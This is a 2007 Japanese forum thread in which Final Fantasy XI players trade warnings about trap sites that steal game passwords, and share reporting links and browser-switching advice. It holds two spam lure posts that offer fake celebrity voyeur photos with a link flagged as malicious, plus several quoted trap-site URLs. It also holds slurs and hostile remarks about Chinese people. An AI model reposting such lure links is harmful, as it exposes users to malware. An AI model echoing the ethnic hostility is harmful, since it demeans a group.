お前日本人だろw
716 :既にその名前は使われています:2007/10/18(木) 21:26:38.71 ID:NH8+rpZ0
もう笑っちまうよwwwwwwwwwwwww
>>714
小中国 cao ni ma
717 :既にその名前は使われています:2007/10/18(木) 21:30:00.24 ID:UWP3uCQB
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
718 :既にその名前は使われています:2007/10/18(木) 21:30:44.08 ID:W2D7YWwS
いいかげんうざいな
719 :既にその名前は使われています:2007/10/18(木) 21:31:00.10 ID:NH8+rpZ0
日本人スタッフかこのやろう
720 :既にその名前は使われています:2007/10/18(木) 21:31:50.21 ID:UWP3uCQB
是不是用安田美沙孩子温泉?施
赤裸?拍 ?于被拍?了???只能??是安田美沙孩子在温泉?施的洗澡中被?
拍穿(戴) 怎?看也本人的那??和身体被?明都放映出的↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
721 :既にその名前は使われています:2007/10/18(木) 21:33:25.17 ID:NH8+rpZ0
日本語でおk
722 :既にその名前は使われています:2007/10/18(木) 21:36:32.18 ID:y52zr773
自動保守マシーンとして役立ちそうだ
723 :既にその名前は使われています:2007/10/18(木) 21:38:43.12 ID:mBye07uj
日本人だな
エキサイト翻訳のまんまじゃんw
724 :既にその名前は使われています:2007/10/18(木) 21:41:53.51 ID:KJHpe4AW
流れワロスw
725 :既にその名前は使われています:2007/10/18(木) 21:44:18.70 ID:vZ0/xsyM
日本人だろうが中国人だろうが宇宙人だろうがやっちゃいけないことを判別できないヤツは規制されてしかるべき
726 :既にその名前は使われています:2007/10/18(木) 21:45:27.34 ID:NH8+rpZ0
くだらねーことしてんじゃねーよ
727 :既にその名前は使われています:2007/10/18(木) 21:45:30.21 ID:H+rgjEKw
ネ実でパス抜きサイト張ってる輩が同一Iであれば規制入れて貰うのが一番いいんじゃない?
恐らく一時的でしかないと思うけど。
同一IPって証拠もないから無理なのかな・・・・・。
728 :既にその名前は使われています:2007/10/18(木) 21:45:43.03 ID:3XEyHkBA
>>624
亀だけど、被害届けも多ければ、
「犯人の断定にはいたりませんでした」で調査終わらせられなくなるんじゃないかなと〜
それに他の方がおっしゃってる通り、公式でも大きく注意喚起してくれれば見る人もいるだろうし
ブログやってる人で、自分の所にはられるまで罠サイトなんて知らなかった人もいましたし
729 :既にその名前は使われています:2007/10/18(木) 21:45:51.15 ID:KZB1UQQq
逆に中国人を引っ掛けようとしてるのかもしれんぞ、ここ見てる中国人がいればの話だが
730 :既にその名前は使われています:2007/10/18(木) 21:52:34.86 ID:tbSb+fbm
>>727
一応、某所のスレへ広告連投報告は入れてRock扱いにしてもらったのですが
IP規制は一般からの報告だと無理らしく、本当にどうしたものやら…orz
731 :既にその名前は使われています:2007/10/18(木) 21:53:17.17 ID:c5mCt//Y
>>727
同一IPかどうかは運営サイドが判断してくれる筈
って言うか明らかに規制対象候補な書き込みは
IPを教えて暮れる筈だよ
732 :既にその名前は使われています:2007/10/18(木) 21:54:01.18 ID:c5mCt//Y
ありゃダメなのかスマン
733 :既にその名前は使われています:2007/10/18(木) 21:54:05.44 ID:qRPlOxfB
シナ人業者でもなんでもなく単純に面白がってコピペ張ってる日本人の
お子様がもしいたら今のうちにゴメンナサイして消えといた方いいよ
コレは亀田のお祭りコピペや鯖の晒しリストを張るのとは違うからね
734 :既にその名前は使われています:2007/10/18(木) 21:56:31.94 ID:vkpA8HL7
>>733
報道されてみると20〜30代のリーマンだったりすんだよね
735 :既にその名前は使われています:2007/10/18(木) 21:57:19.90 ID:W2D7YWwS
頭脳は子供、身体は大人
736 :既にその名前は使われています:2007/10/18(木) 22:02:10.05 ID:XZ5WSI1n
自分がよくチェックするブログとかでも内容はFFの事なんだけど
その記事に関係ない話題のコメントがURLつきで書きこまれてるのはここ最近よく見るな。
てか最近裏LSの奴が他人にログインされたっぽくてエクレア以外のアイテムが全部無くなったらしい・・・。
エクレアは全部残ってるのにそれ以外はなくなってるって事はを怨恨とかじゃなくて業者だよなやっぱり。
あいつらもうゲーム内でギル稼ぐのが困難になってきたから他人のキャラのアイテム
売っぱらうとか形振り構わなくなってきたな。
737 :既にその名前は使われています:2007/10/18(木) 22:08:05.22 ID:xkV3GsES
日本人ぽいし通報しとくか。
「出来心で・・・」くらいで逃げれると思うなよ。
738 :既にその名前は使われています:2007/10/18(木) 22:15:05.98 ID:qRPlOxfB
そう
まずは業者よりも悪ノリしてる日本人を処分して
後方の憂いを取り除くべき
さっきから張ってる人もし日本語がわかるならやめなさい
わかるね?
739 :既にその名前は使われています:2007/10/18(木) 22:16:31.46 ID:W2D7YWwS
通報GJ
740 :既にその名前は使われています:2007/10/18(木) 22:20:13.75 ID:vkpA8HL7
助長行為は30万以下の罰金だけか
緩いな
741 :既にその名前は使われています:2007/10/18(木) 22:34:15.02 ID:YeoZH9fC
ソースチェッカー
ttp://so.7walker.net/guide.php
ってところ、今行ってみたら
またハッキングされる可能性があるので、当分来ない方がいいかも。
とあったよー。中華ハッキング本格的になってきてない?
742 :既にその名前は使われています:2007/10/18(木) 22:57:19.89 ID:v/d9uRL7
○通報先・便利なリンク一覧
■警視庁匿名通報フォーム(通報は2chのように書き込むだけ)
http://wannabe.fam.cx/service/link.cgi?http://www.keishicho.metro.tokyo.jp/anket/other.htm
■全国ハイテク警察リンク集 http://wannabe.fam.cx/service/link.cgi?http://www002.upp.so-net.ne.jp/dalk/ksatulink.html
■警視庁ホームページ http://wannabe.fam.cx/service/link.cgi?http://www.keishicho.metro.tokyo.jp/
■警察総合相談電話番号 http://wannabe.fam.cx/service/link.cgi?http://www.npa.go.jp/safetylife/soudan/madoguchi.htm
(携帯電話・PHSからは全国共通#9110 緊急性を要するものは110)
■公安調査庁 http://wannabe.fam.cx/service/link.cgi?http://www.moj.go.jp/KOUAN/
■国家公安委員会 http://wannabe.fam.cx/service/link.cgi?http://www.npsc.go.jp/
■国際刑事警察機構(ICPO) http://wannabe.fam.cx/service/link.cgi?http://www.interpol.int/
■国防省(アメリカ) http://wannabe.fam.cx/service/link.cgi?http://www.defenselink.mil/
743 :既にその名前は使われています:2007/10/18(木) 23:00:11.56 ID:VfGQItA4
>>687
これって釣りかコピペかな?
釣りじゃない時用に一応マジレスw
どっかのAntiVirusソフトのデフォルト設定は、毎週金曜日12:00に自動スキャン開始になっているよ
ウザイなら設定変更するよろしw
744 :既にその名前は使われています:2007/10/18(木) 23:05:35.67 ID:FGdLy3JS
ハッキングを防ぐためにハッカーへお金を渡すのか? 2007.10.16
http://wannabe.fam.cx/service/link.cgi?http://www.gpara.com/kaigainews/korea/2007101603.php
中華は今こんなことしてる 次は日本もやられるぜ。
745 :既にその名前は使われています:2007/10/18(木) 23:43:42.97 ID:EDOH1RZ5
しかし、Windows updateしてないやつが何でこんなにいるんだ。
買ってきたパソコンってたいていデフォルトで自動更新オンになってるだろうし。
対策してる人が多くなれば奴らも無駄なことはあんまりしてこなくなると思うんだがな。
0dayとかはしょうがないが・・・
746 :既にその名前は使われています:2007/10/18(木) 23:43:57.45 ID:d9C9cdWT
割れじゃね?
747 :既にその名前は使われています:2007/10/18(木) 23:45:12.77 ID:vkpA8HL7
>>745-746
FFの全画面落ちとか
そんな理由じゃね?
748 :既にその名前は使われています:2007/10/19(金) 00:03:31.16 ID:nPA3xzRh
安田美沙子ネタの、ネットウォッチ板のFFブログスレにまで何度も貼られてるな
749 :既にその名前は使われています:2007/10/19(金) 00:12:08.47 ID:hRk+i6VN
>>744
これは bot net っしょ
日本を含めた世界中に bot が仕込まれてて、命令1つで一斉にアクセスさせることができる(DDoS)
当然、ターゲットのネットワークは高負荷になって結果的にサービスが満足に提供できなくなる
これが裏で商売になってるんだよね(汗
FFで食らったDDoSもこの手法でやられたと俺は思ってる
750 :既にその名前は使われています:2007/10/19(金) 01:38:41.98 ID:eBudDrSR
>>663
この前罠サイト踏んでやべぇーって思って
avastとspybotスキャンしたけどOperaだったから無事だったのかw
オペラユーザーで助かったぜ
751 :既にその名前は使われています:2007/10/19(金) 02:17:37.57 ID:V6RCl/kD
age
752 :既にその名前は使われています:2007/10/19(金) 02:26:51.53 ID:dL7bPS9X
POLパスを全角漢字可にする
→みんな「任意のパス+天安門」にする
こうすればいいんじゃね
753 :既にその名前は使われています:2007/10/19(金) 02:30:42.19 ID:zgqmI0VP
>>752
ID・パス・キーワード入力にすればいい
パス全角だと表示しなけりゃ入力できないからね
754 :既にその名前は使われています:2007/10/19(金) 02:32:45.64 ID:dL7bPS9X
>753
INT高いなお前
755 :既にその名前は使われています:2007/10/19(金) 02:37:02.06 ID:eBudDrSR
>>733の言うとおりだな
国内だと刑法適用でKが動いたら挙げられるぞw
面白半分で人生捨てちゃいかんよ
756 :既にその名前は使われています:2007/10/19(金) 02:57:40.81 ID:bYt45dYc
警戒を促す意味も込めてageておく
757 :既にその名前は使われています:2007/10/19(金) 03:16:14.21 ID:xlLiN4wz
>744
読んだけど、やり口がギャング・マフィアそのものだな
758 :既にその名前は使われています:2007/10/19(金) 03:23:26.23 ID:VRiPIQLr
>>752
残念ながら、集めた情報を圧縮して送ってるフシがある
759 :既にその名前は使われています:2007/10/19(金) 06:57:38.22 ID:z0V3M0Ae
>>747
俺はまさにその理由でFF専用マシンの自動UPDATE切ってるけど、自動通知はさせてる
ログインする前か電源落とす前に、updateすれば無問題だな
760 :既にその名前は使われています:2007/10/19(金) 07:03:04.95 ID:WX6+CezA
age推奨でいこうぜ
761 :既にその名前は使われています:2007/10/19(金) 08:57:09.79 ID:98V1MRZX
ffzuotu.jpgこのファイルURLがブログのトラバにきてたな。URL全部同じだったかはわからんけど。
しかも面識全然まったくないけど同鯖のブログもちの人の名前つかってやがった。
全然記事関係なかったから踏みもせず削除したけど悪質すぎる。
762 :既にその名前は使われています:2007/10/19(金) 09:09:23.70 ID:mMJyggkD
まったく、FFやってる機械と同じ機械でネットサーフィンするなよ。
俺なんて罠かな?と思ったら会社のPCから踏むようにしてるからFFは安全だな。
763 :既にその名前は使われています:2007/10/19(金) 09:17:26.78 ID:/oTWfU+Q
ネットサーフしててブログとかで罠コメ見つけたら、
一応警告コメ残すようにはしてるが
アホなブログ管理者は危機感がないから削除しないんだよな
764 :既にその名前は使われています:2007/10/19(金) 09:41:19.41 ID:7n4TqR5v
>>763
リンク先のブログにコメントのついでに警告しておいたら
返事は「自分PSなので大丈夫です^^」だったぜww
765 :既にその名前は使われています:2007/10/19(金) 09:45:08.96 ID:dL7bPS9X
公開してるって意識が低いんだろうな
766 :既にその名前は使われています:2007/10/19(金) 09:50:13.51 ID:UhB+1cin
だからmixiとかでキセルしたとか書いてフルボッコ食らってる奴とかが後を絶たないんだよなw
767 :既にその名前は使われています:2007/10/19(金) 09:57:26.49 ID:Lcdglqwj
>>764
目が点になった… どこだよそこw
いや晒さんでいいけど
考えているより被害は尋常じゃないかもしれないな
768 :既にその名前は使われています:2007/10/19(金) 10:25:00.45 ID:6xSF6oyZ
PeerGuardian2入れてみた。
いやあブロックすることすること。。。ついでにwikiも見られなくなって爆笑。
リネのパス抜きを警告してるサイトあったが、FFはないのかね。
リストあったら突っ込んでおきたい。知ってる人いたらぜひ紹介してもらえないだろうか。
それとも自動アップだけで十分?
769 :既にその名前は使われています:2007/10/19(金) 10:30:01.65 ID:NL8kiBxJ
テンプレ作ってくれれば俺がジオ辺りにテンプレサイト作ってもいいが
暇な奴いたらまとめてくれん?
770 :既にその名前は使われています:2007/10/19(金) 11:03:39.63 ID:Si2nbZ/p
俺もFFPCでネットも観てるから、垢取られた人の事も他人事ではないな・・・
IE6使いなのでこれを機にスレイプニールか炎狐に代えてみるか。
あと、2ch専ブラだとjpg付きのurlもカーソール置けないな。
771 :既にその名前は使われています:2007/10/19(金) 11:03:44.79 ID:sV9COy7b
【社会】警視庁「サイバーパトロール」を民間委託−ネット上の違法・有害情報の監視、情報収集を強化
http://wannabe.fam.cx/service/link.cgi?http://news22.2ch.net/test/read.cgi/newsplus/1192718217/l50
[log]
通報はしないよりはしたほうがマシということで
772 :既にその名前は使われています:2007/10/19(金) 11:17:48.03 ID:Si2nbZ/p
セキュリティソフトなんだが、
シナのキングソフトは、(糞ー巣ネクストのウィルスZEROもかな?)
スパイウェアのJ-Wordブチ込まれるから買わないようになw
773 :既にその名前は使われています:2007/10/19(金) 11:29:11.95 ID:sV9COy7b
大阪の高3男子を書類送検=他人IDでオンラインゲーム−静岡県警
http://wannabe.fam.cx/service/link.cgi?http://headlines.yahoo.co.jp/hl?a=20071018-00000121-jij-soci
ゲーム人口の割りにFFでニュースって聞いたことないな
NHKのアレくらいか?
774 :既にその名前は使われています:2007/10/19(金) 11:36:35.51 ID:zkUPQNGa
よかった、ブログとか興味なくてアクセスすらしないや
攻略サイトも最近ほぼみてないからうまー
775 :既にその名前は使われています:2007/10/19(金) 11:50:49.43 ID:tmxcJ04/
FFで不正アクセスって聞いたことねーなー
スクエニがやる気ないのか治安がいいのか分からんね
776 :既にその名前は使われています:2007/10/19(金) 11:56:33.35 ID:6P6pI57F
>>775
不正アクセスの被害届けはサーバ所持者(■e)が警察に届けないとならないから
契約者が被害受けて■eに通報してももみ消されるだけで事件にはならない
つまり■eは自社の名前を貶めないために通報してない
すでに今回のスパイソフト事件での被害者は大勢いるが表ざたにならないのはそう言う理由から
実際にパス抜かれて財産を奪われた奴は大勢いる
777 :既にその名前は使われています:2007/10/19(金) 11:58:37.71 ID:PzP4U06H
警察に直接通報とか消費者センター?に言ってもダメなのかな?
778 :既にその名前は使われています:2007/10/19(金) 12:03:31.00 ID:dPDiTqmy
地球事件も不正アクセスだったろ
779 :既にその名前は使われています:2007/10/19(金) 12:07:27.40 ID:sV9COy7b
■はどうも口止めしたいようで…
警察への被害届けと消費者センターへの通報はしたほうが良い
このままじゃ対策は数年後、被害補償なしの泣き寝入りは確実
リアルマネーに被害受けてる奴だっているのにさ
780 :既にその名前は使われています:2007/10/19(金) 12:15:01.89 ID:XLhZJMJf
たかがネトゲのパス抜き被害とか思っても
これで味をしめてノウハウ作った暁には・・・・
あとは解るな
781 :既にその名前は使われています:2007/10/19(金) 12:36:08.03 ID:TmGR4Ne2
>>776
財産・・・ね(*^_^*)
782 :既にその名前は使われています:2007/10/19(金) 12:37:56.49 ID:hW+9JOke
>>781
パス抜かれた上にクレカの情報も盗まれたーって人は結構いると思うよ
783 :既にその名前は使われています:2007/10/19(金) 12:44:59.12 ID:TmGR4Ne2
いると 思うよ ・・・かw
784 :既にその名前は使われています:2007/10/19(金) 12:49:57.93 ID:rlG3k6Cv
勝手に鯖移動させられた人は、鯖移動代負担で小額ながらも被害出てるみたいだな
つか>>559〜に書いてあるな
785 :既にその名前は使われています:2007/10/19(金) 12:50:05.69 ID:YT8xxZKO
RMTスレのあの人がこのスレに来たか…
786 :既にその名前は使われています:2007/10/19(金) 12:51:42.69 ID:Z9vBn3WB
>>783
559-600のあたりに登録してたクレカで勝手に鯖移動させられた被害者がいるよ
■の糞対応次第じゃ6300円の自腹になる可能性もありそうで怖い
787 :既にその名前は使われています:2007/10/19(金) 13:00:45.73 ID:z0V3M0Ae
>>770
待て、スレイプニルはベースがIEだ。
全く同じとはいわないが、IEの脆弱性は引き継ぐぞ
Operaか火狐お勧め
俺はOpera派
つか、昔はマウスジェスチャーとか考えると、それしか選択肢なかったんだがなー
788 :既にその名前は使われています:2007/10/19(金) 13:05:05.81 ID:DfVt6ozk
ID:TmGR4Ne2を相手にしてはいけない
初音ミク事件簿ファイル
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192675385/
[log]
339 名前:既にその名前は使われています[] 投稿日:2007/10/19(金) 12:28:33.71 ID:TmGR4Ne2
しかし騒ぐのは時期尚早な気がするな
まだ意図的なものか、事故なのかすらはっきりしていないわけだし
裏付けのないデマのような情報ばかりだし・・・
345 名前:既にその名前は使われています[] 投稿日:2007/10/19(金) 12:48:42.45 ID:TmGR4Ne2
>>340
誰が?どうやって?なにが目的で?
ソース付けてきちんと説明できるの?
789 :既にその名前は使われています:2007/10/19(金) 13:06:23.04 ID:sF9VOCXJ
クレカ自動で使われたならまず連絡するのはクレジット会社じゃないか?
どこのIPからオンライン決済されたか全部情報はあるだろうし特定も早いだろうに。
790 :既にその名前は使われています:2007/10/19(金) 13:07:18.18 ID:sF9VOCXJ
>>788
2スレ見ただけで痛い奴だと直感してあぽーん設定した俺は正解だったのかw
791 :既にその名前は使われています:2007/10/19(金) 13:07:32.15 ID:Mo7ac6qY
>>787 に勝手に少し追記
Sleipnir はエンジンを選択できるから、Gecko にすれば一応 IE の脆弱性は引き継がない
でもデフォルトは Trident (IE)
変更方法は 『F12 → (クライアント - 全般) → 既定のブラウザエンジン』
792 :既にその名前は使われています:2007/10/19(金) 13:08:27.97 ID:6P6pI57F
>>789
FFのクレジット決済は自動引き落としだからどこから接続したかは分らないだろ
793 :既にその名前は使われています:2007/10/19(金) 13:14:45.42 ID:sF9VOCXJ
>>792
クレジットカードのオンライン決済は毎回カードが使えるか認証するぞ・・。
それとも■eが代わりにカード会社に認証してくれるのか?w
まぁシナ畜IPなんだろうけどな・・。串も通ってるのかねぇ
794 :既にその名前は使われています:2007/10/19(金) 13:26:02.26 ID:6P6pI57F
>>793
俺クレカだが毎月自動だぞ?
795 :既にその名前は使われています:2007/10/19(金) 13:49:04.64 ID:M+SeC/cp
被害出てるのかねぇ・・・
まぁここ見てるようなやつは引っかかることはないだろうが
それにしても業者一線越えたよな RMT容認を叫んでたやつの意見が今聞きたいな。
796 :既にその名前は使われています:2007/10/19(金) 13:57:31.00 ID:sV9COy7b
Luckshop
確認できるだけで21の鯖にいる業者の故売担当キャラ
FFAHで履歴調べると色々わかる
797 :既にその名前は使われています:2007/10/19(金) 14:47:17.95 ID:w2UIpQG1
昔、価格.comやVectorが改竄されて事件になったでそ。
業者はあれ以前から一線越えてる。
中国内のMMOでやったら捕まるけど
中国から日本へ繋いでアイテム奪っても
捕まらないのを知っててやってる。
自衛するしかないよ。
他のMMOから移ってきたんだけど、
垢ハクの話が出て来なかったのは■eが対処してるからだと思ってたよ。
798 :既にその名前は使われています:2007/10/19(金) 15:45:55.91 ID:p/+ODfL6
最終的に、自分の可愛い分身を守ってやれるのは自分自身だけって事だね。
799 :既にその名前は使われています:2007/10/19(金) 16:30:00.68 ID:MYwzn+4o
もう中国は地球上からなくなっていいよ。
かつては豊富な資源のあった土地だったけど
いまや環境汚染でヒドイもんだし。
土地も人間も腐っちゃったんだよ!
800 :既にその名前は使われています:2007/10/19(金) 16:49:36.33 ID:ijIy9umK
中国は開発で森林が激減して砂漠化>それでも資材が足りないとルワンダに進出、取り決め以上に伐採しまくってるらしいな・・・
801 :既にその名前は使われています:2007/10/19(金) 17:05:02.82 ID:eBudDrSR
>>779
被害でてるのに放置してるのがばれたら事業者としてはまずいからな。
新ディスクの方に人まわしてそっちの対策まで人手足りないんじゃないかねぇ
802 :既にその名前は使われています:2007/10/19(金) 17:14:53.93 ID:fjtRoNVu
ミクにて日記にレスされたから報告
ttp://www●rock-pine●com/ff11/
記事内容は
本日発売のCCFFVIIアルティマニアに「FF20thAnniversaryアルティマニア」のチラシがついていました。
内容は、シリーズに登場したキャラクターを網羅する「キャラクター編」、歴代作品のストーリーを完全プレイバックする「ストーリー編」、バトルとモンスター、さらにシークレットを集めた「スペシャル編」の3編から成るとのこと。
aguse.で調べたところ
サイト登録日は2007-10-17 08:44:08
IPアドレスは61.139.126.8
国名:China 都市名:Changdu
SSでは、FF11のブログっぽい感じ
以上報告ですた。
引っかかる前に炎狐に変更して、ミクとサイトに注意書き書いた後だったから、助かった、感謝。
803 :既にその名前は使われています:2007/10/19(金) 17:28:49.62 ID:MYwzn+4o
うちも炎狐にかえたわ。
何気にタグ機能便利だな。
804 :既にその名前は使われています:2007/10/19(金) 17:47:13.65 ID:UVK9OxvX
>>796
うお・・・俺のフレが取られたアイテムと同じものをまとめて同じ日に売っていて、
すっげー怪しいと思っていたキャラだわ・・・
805 :既にその名前は使われています:2007/10/19(金) 17:53:45.02 ID:4y5d81uV
某晒し板を見てたら
攻略情報www●playonlanei●com/game
ってのが張られてたんで調べてみたら
案の定トロイ(Downloader/Small.57.Trojan)が仕込まれてたみたいだ。
goggleみたいに紛らわしい系なんで気をつけてくれ。
たまには晒し板も役に立つもんだw
806 :既にその名前は使われています:2007/10/19(金) 17:54:28.43 ID:9UA0naIX
某アニメスレ
>No.140『ララさん』
>ハチの巣なら、草刈鎌持ってギデアスへ(`?ω?′)
>あと、獣使いお持ちですよね? 巣のサソリが夢の100%ドロップ(しかも3つ)で、LV上げともかぶりません。カバンがいっぱいになったらデジョンして店売り。(サポ黒w)短時間の小銭稼ぎにどうでしょう。
>://mbspro6uic●こむ/yutangff/ffzuotu●jpg
DATE:2007/10/19(金) 12:26:12.06 ID:sgq8tXFc
ffずおつでぐぐると450件くらいヒットするな
上位は注意喚起してる文章だったけど
807 :既にその名前は使われています:2007/10/19(金) 18:24:00.65 ID:sWwp8b1X
IEのブックマークをfirefoxに移動させる方法ない?
808 :既にその名前は使われています:2007/10/19(金) 18:24:44.41 ID:ijIy9umK
>>807
一番左のプルダウンメニューの中にインポートとか無い?
809 :既にその名前は使われています:2007/10/19(金) 18:25:36.26 ID:z0V3M0Ae
>>807
どっかにインポートない?
OperaとかSleipnirは、ファイル>インポート>ブックマーク〜で出来るよ
810 :既にその名前は使われています:2007/10/19(金) 18:55:19.77 ID:MYwzn+4o
■eも重い腰あげりゃいいのにな・・・
811 :既にその名前は使われています:2007/10/19(金) 18:55:56.83 ID:bOzt40ti
age
812 :既にその名前は使われています:2007/10/19(金) 18:56:28.63 ID:sWwp8b1X
>>808
>>809
おお、できました。感謝します
813 :既にその名前は使われています:2007/10/19(金) 18:57:43.00 ID:Fza/2ovz
今週抜きサイト張りまくり、いよいよ金曜
明日明後日サポセン休み。
中華始まったな
814 :既にその名前は使われています:2007/10/19(金) 18:57:57.02 ID:7GAfFcCk
>>805
おでんだろ?
晒された奴が貼りまくってるんじゃないかって噂
815 :既にその名前は使われています:2007/10/19(金) 19:00:44.25 ID:4L6RJj6f
ココ読んで今日からFirefoxに変えた。慣れてないので少し使いにくい;
816 :既にその名前は使われています:2007/10/19(金) 19:04:31.57 ID:MYwzn+4o
初日だけだと思う。
タグかなりいいや。IE7にすればIEもタグ使えるんだが
いかんせんIE7自体が罠なんだよなぁ。
罠サイトよりもIE7の不具合に嫌気さしてFireFoxに変えたわ。
817 :既にその名前は使われています:2007/10/19(金) 19:05:44.65 ID:lONHj5dv
なんかFirefox人気だな。
フォクすけブラウザはカスタマイズで
自分の使いやすくしていくブラウザなんで
↓まとめとか見つつ頑張れ。
ttp://firefox.geckodev.org/
818 :既にその名前は使われています:2007/10/19(金) 19:16:53.22 ID:5f7g4mdY
>>804
Utino鯖じゃ太公望の履歴が複数あるんで調べてみたら…
合成職人の売り方じゃないね
こんな引退バーゲンみたいな履歴が同名複数いるはずがない
819 :既にその名前は使われています:2007/10/19(金) 19:25:23.01 ID:LFlSrV0o
>>802
俺のミク日記にもそれ書き込まれてた。速攻削除したが、誰か踏んで
ないだろうな・・・
ちなみに日記の内容が「罠HPに注意!この日記にもコメ書かれるかも」
だった・・・
まさかマジで書き込まれるとは思わなかったぜ。
820 :既にその名前は使われています:2007/10/19(金) 19:25:31.28 ID:OE1FDOjE
>>781
財産とは経済的価値のあるもの、って意味で使うんだが、
RMT、キャラ売りが商売として成り立っている以上、ゲームの中のアイテム、
お金は財産になると思うよ。リアルのお金に換算できてるわけだからね。
821 :既にその名前は使われています:2007/10/19(金) 19:35:13.17 ID:yxsNH5y2
>>796
ちょっと見てきたけどすげーな…
ギル貯めて落札したアイテムが盗品とか気まずいだろ
822 :既にその名前は使われています:2007/10/19(金) 19:39:50.87 ID:2SiecjM1
即座にBAN出来ないんかね
823 :既にその名前は使われています:2007/10/19(金) 19:46:18.74 ID:PzP4U06H
泳がせてそうだな屑エニのことだし。
それで業者一網打尽です^^とかあほな事言い出しそう。
もう被害でてるのにね。
824 :既にその名前は使われています:2007/10/19(金) 19:49:57.41 ID:yxsNH5y2
アイテムだけでなく現金被害あるんだしな
825 :既にその名前は使われています:2007/10/19(金) 20:03:05.79 ID:ol1+Nosq
>>796
>>821
該当する全キャラを一通り見た感じここ1〜2ヶ月程度から動き始めたキャラ多いね。
そしてこの一件が広まり始めた時期とほぼ一致する。
十中八九このキャラを取りまとめてる中華のグループが首謀してる可能性が非常に大きい。
826 :既にその名前は使われています:2007/10/19(金) 20:07:18.22 ID:eT/6AKX7
今週なにもなかったからって安心できないのか・・・
サポセン休みの週末狙ってくる可能性もあるわけね
自衛手段はとってるし、へんなアドレス踏んだ覚えもないけどなんとなく不安だ・・・
ウイルスチェック、スパイウェアチェックも何もひっかからないけど
それでもなにか潜んでる可能性あるんだろうか・・・
827 :既にその名前は使われています:2007/10/19(金) 20:07:28.75 ID:4L6RJj6f
Luckshopってヤバイな・・・これが全部アカハックの盗品かよ
ストライダーブーツとか盗まれても泣き寝入りか;
828 :既にその名前は使われています:2007/10/19(金) 20:17:43.43 ID:e0Zv1OJf
ネ実にいるような奴らは問題ないが、ネット初心者は結構引っかかりそうだな
特にPS2出身でPCに慣れてないユーザーなんかはあっさりやれそう
829 :既にその名前は使われています:2007/10/19(金) 20:19:01.96 ID:TlZT2ECA
>820
換金は違法でないにしても規約で禁止されている。
それ以前にFF11のデータは■eの所有物。
ユーザーが金払ってるのはプレイ権に対して。
クレカの話、またはゲーム内における財産って話ならともかく、
現実の財産と言うのは現時点では無理があると思うが。
830 :既にその名前は使われています:2007/10/19(金) 20:25:09.54 ID:5f7g4mdY
>>829
ゴルフの会員権もプレイ権だけど、あれは財産扱いにならんのかね?
831 :既にその名前は使われています:2007/10/19(金) 20:26:21.08 ID:PzP4U06H
>>830
あれは譲渡できなかった?
832 :既にその名前は使われています:2007/10/19(金) 20:26:55.45 ID:2SiecjM1
RMTerのやってる事はそこら山を勝手に開発して
勝手に金のやり取りしてるだけだよw
833 :既にその名前は使われています:2007/10/19(金) 20:27:28.15 ID:4y5d81uV
>>814
mjk
さすがおでんだ、何が起こっても不思議じゃないぜ
834 :既にその名前は使われています:2007/10/19(金) 20:30:02.76 ID:5f7g4mdY
これからは、RMTを購入するというのは犯罪に加担するのと同義になったね
故売担当が衆知されるようになれば、善意の第三者ともいってられないだろうし
835 :既にその名前は使われています:2007/10/19(金) 20:32:56.69 ID:yxsNH5y2
おでんにはLuckshopって居ないんだな
836 :既にその名前は使われています:2007/10/19(金) 21:04:33.61 ID:TlZT2ECA
>830
プレイ権とゲーム内アイテムやキャラデータは別物。
それに細かい事を抜きにしても
ゴルフ会員権だって売り手と買い手(と仲介)だけで売買してるわけではない。
837 :既にその名前は使われています:2007/10/19(金) 21:11:49.69 ID:pGJCOvFj
うちもLuckshopにやられたにゃー;
GMにも念のため、そいつが疑わしいと伝えたけど型通りの返事だった…
(たしか>>562の言ってる人と同じClokettinって名前だった気がする)
とりあえず警察の安全課に被害届は出した。
やはりFFの概要が分かる資料などは求められた。
田舎の警察だから期待できないが…
838 :既にその名前は使われています:2007/10/19(金) 21:14:38.93 ID:eT/6AKX7
平日週末限らず踏んだら即やられるんだろうか?
839 :既にその名前は使われています:2007/10/19(金) 21:18:54.53 ID:ijIy9umK
やつらに休日は無いんじゃね?
日本時間朝6時〜15時までは休憩してるかもしれんが。
840 :既にその名前は使われています:2007/10/19(金) 21:22:53.47 ID:zgqmI0VP
>>839
前にどこかで読んだけど
1日12時間の2交代制でノンストップらしいぞ
海外規制しても、中国の豚小屋から
日本のプロクシ経由でアクセスしてくるらしい
841 :既にその名前は使われています:2007/10/19(金) 21:44:48.42 ID:ijIy9umK
>>840
それは多分ゲーム内のキャラを操作するほう。
このまえのwiki書き換え合戦をやったとき、ほぼ毎日早朝5:30頃から15:30頃まで書き換えがストップするので
おそらくその時間帯ホームページを扱う方の集団はおやすみしてる感じがした。
842 :既にその名前は使われています:2007/10/19(金) 22:21:38.38 ID:ol1+Nosq
中国って時差-1時間だっけ?
なら実際作業開始時間は午前4時半からか・・・。
ご苦労なこった。
843 :既にその名前は使われています:2007/10/19(金) 22:51:47.41 ID:xLCvP9D4
ブラウザ変えようと思うんだけど、どれがいいですかねー
今Sleipnirなんですけど 安全ならOperaですか?
844 :既にその名前は使われています:2007/10/19(金) 23:04:33.74 ID:KfqqY74b
おフェラ軽くていいよ
845 :既にその名前は使われています:2007/10/19(金) 23:14:12.51 ID:KfqqY74b
なんか公式きたぞ
846 :既にその名前は使われています:2007/10/19(金) 23:19:02.49 ID:ijIy9umK
>公式
見てきた。
パスそのものが盗まれるんだから文字数増やしてもムダなんじゃ・・・
847 :既にその名前は使われています:2007/10/19(金) 23:20:02.28 ID:hRk+i6VN
http://wannabe.fam.cx/service/link.cgi?http://www.playonline.com/ff11/polnews/news11584.shtml
これか・・・このスレとはまったく関係ないな(汗
848 :既にその名前は使われています:2007/10/19(金) 23:20:03.67 ID:zgqmI0VP
>>846
スクウェアなめんじゃねぇ!
849 :既にその名前は使われています:2007/10/19(金) 23:22:19.43 ID:ijIy9umK
増加するアカハックをうけての対策・・・なのかなぁ
850 :既にその名前は使われています:2007/10/19(金) 23:36:12.78 ID:6Lf/oiZr
対策になってんのか?
851 :既にその名前は使われています:2007/10/20(土) 00:43:45.88 ID:47G8ubuq
http://wannabe.fam.cx/service/link.cgi?http://www.mcafee.com/japan/security/virPQ.asp?v=PWS-Mmorpg.gen
これの、
